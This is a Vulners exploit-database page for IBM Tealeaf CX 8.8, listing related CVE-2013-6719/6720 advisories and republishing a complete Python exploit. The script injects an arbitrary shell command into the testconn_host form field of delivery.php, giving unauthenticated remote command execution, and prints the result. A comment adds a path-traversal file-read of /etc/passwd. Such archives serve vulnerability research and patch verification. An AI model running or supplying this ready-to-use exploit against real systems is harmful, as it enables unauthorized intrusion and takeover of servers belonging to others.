Vulners
Lucene search
IBM Tealeaf CX 8.8 - Remote OS Command Injection
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | Security Bulletins for IBM Tealeaf Customer Experience offerings | 16 Jun 201819:35 | – | ibm |
| Security Bulletin: IBM Tealeaf CX Passive Capture Application is vulnerable to a remotely exploitable OS command injection and local file inclusion (CVE-2013-6719 and CVE-2013-6720) | 16 Jun 201819:35 | – | ibm |
 | IBM Tealeaf CX 8.8 - Remote OS Command Injection Vulnerability | 27 Mar 201400:00 | – | zdt |
 | Command Injection Over HTTP Payload (CVE-2013-6719; CVE-2013-6720; CVE-2020-26728; CVE-2022-30105) | 3 Jul 201800:00 | – | checkpoint_advisories |
 | CVE-2013-6719 | 6 Mar 201411:00 | – | cve |
| CVE-2013-6720 | 6 Mar 201411:00 | – | cve |
 | CVE-2013-6719 | 6 Mar 201411:00 | – | cvelist |
| CVE-2013-6720 | 6 Mar 201411:00 | – | cvelist |
 | EUVD-2013-6521 | 7 Oct 202500:30 | – | euvd |
| EUVD-2013-6522 | 7 Oct 202500:30 | – | euvd |
10
# IBM Tealeaf CX (v8 release 8) Remote OS Command Injection
# Date: 11/08/2013
# Exploit author: drone
# More information: http://www-01.ibm.com/support/docview.wss?uid=swg21667630
# Vendor homepage: http://www-01.ibm.com/software/info/tealeaf/
# Version: Version 8 Release 8 (likely all versions prior)
# Tested on: Redhat Linux 6.2
# CVE: CVE-2013-6719 / CVE-2013-6720
import requests
from argparse import ArgumentParser
""" Remote OS command injection (no auth)
IBM TeaLeaf Version 8 Release 8
drone (@dronesec)
Bonus:
LFI at /download.php?log=../../etc/passwd
"""
def run(options):
access = "http://{0}:{1}/delivery.php".format(options.address, options.port)
data = {"perform_action" : "testconn",
"delete_id" : "",
"testconn_host" : "8.8.8.8 -c 1 ; {0} ; ping 8.8.8.8 -c 1".format(options.cmd),
"testconn_port" : 1966,
"testconn_t" : "false",
"csrf" : "afe2fce60e94a235511a7397ec5c9a87fb7fc25b", # it doesnt even care
"delivery_mode" : 0,
"batch_interval" : 60,
"polling_interval" : 10,
"watchdog_timer" : 30,
"max_queue_depth" : 50000000,
"timesource_host" : "test",
"timesource_port" : 1966,
"staticshit_enabled" : "on", # seriously
"staticshit_host" : "test",
"staticshit_intervalseconds" : 60,
"staticshit_port" : 1966
}
response = requests.post(access, data=data, timeout=20.0)
if response.status_code == 200:
# lazy parsing
result = response.content.split("alert('")[1].split('onUnload')[0]
for x in result.split("\\n"):
if 'PATTERN' in x: break
print x
def parse_args():
parser = ArgumentParser()
parser.add_argument("-i", help="Server address", action="store",
required=True, dest="address")
parser.add_argument("-p", help='Server port', action='store',
dest='port', default=8080)
parser.add_argument("-c", help='Command to exec', action='store',
dest='cmd', default='whoami')
return parser.parse_args()
if __name__ == "__main__":
run(parse_args())Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Mar 2014 00:00Current
9.5High risk
Vulners AI Score9.5
CVSS 26
EPSS0.10579